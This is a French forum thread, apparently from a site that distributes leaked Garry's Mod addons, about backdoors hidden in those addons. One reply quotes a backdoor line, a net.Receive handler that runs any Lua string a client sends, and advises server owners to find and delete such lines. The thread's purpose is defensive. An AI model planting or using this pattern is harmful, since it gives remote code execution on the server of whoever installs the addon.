• Salut Visiteur ! ✌
    Découvre nos partenaires officiels avec VeryLeak's. Des choix réfléchis, dignes de confiance pour tes avantages.

    StoryFound | REFUNDER TEAM

    StoryFound

    Rejoindre le Canal ✨ ou Plus d'information 📃

    Une question ? Rejoingnez nos différents canaux (Discord, Telegram, Revolt)

    Nos Canaux Communautaires

    Cet affichage peut se clôturer définitivement via la croix en haut à droite.

Backdoor gmod

Vertex

Donateur ❤
Level 5

Torrents Stats

Messages
132
J'aime
787
Trophées
193
Inscrit
3 Mars 2019
Tu peux prendre des addons leak mais bon je te conseil dans ce cas là un bon anti cheat comme image ou lien HS supprimé, le meilleur niveau script exécution et ça qui casse les commandes de base de la plus part des menus. Maintenant le mieux reste de regarder tout les fichiers server de tes addons et dès que tu vois une ligne chelou genre "util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)" ou un http.Fetch tu suppr. En espérant t'avoir aidé ?

C'est cela oui, l'équipe du forum vérifie certains addons. :)

Bonne journée !

Bonjour,

Par rapport à ceci, je peux contredire très fortement les dires du staff, les addons ne sont pas vérifier intégralement, j'ai fait un test sur 6 serveurs, tous les serveurs ont été doté de script " Vérifié " et ont quand même été soit détruit, sois juste modifier, ce qui est assez amusant à ce que je remarque. Je pense que le staff VeryLeak devrait revoir les priorités quand vous vérifier ( Bien qu'il y'ai défois Obfuscation ou autres ).

Je remercie les minables qui mettent des backdoor dans leurs scripts, sa m'as permis de confirmer quelques trucs comme savoir que énormément d'uploadeur ont mis une backdoor et qui font parti de la communauté d'ici.

Je remercie aussi le staff VeryLeakz quand même, par contre, vos addons sont cleans et propre ( J'avais déjà vérifier il y'a un certain temps ). Mon boulot n'ai pas de dire ce qui est bien ou non, juste prévenir que il y'a trop de Kikou qui s'amuse à mettre des backdoors et qui sont vérifier après.

Cordialement Vertex.
 
Haut Bas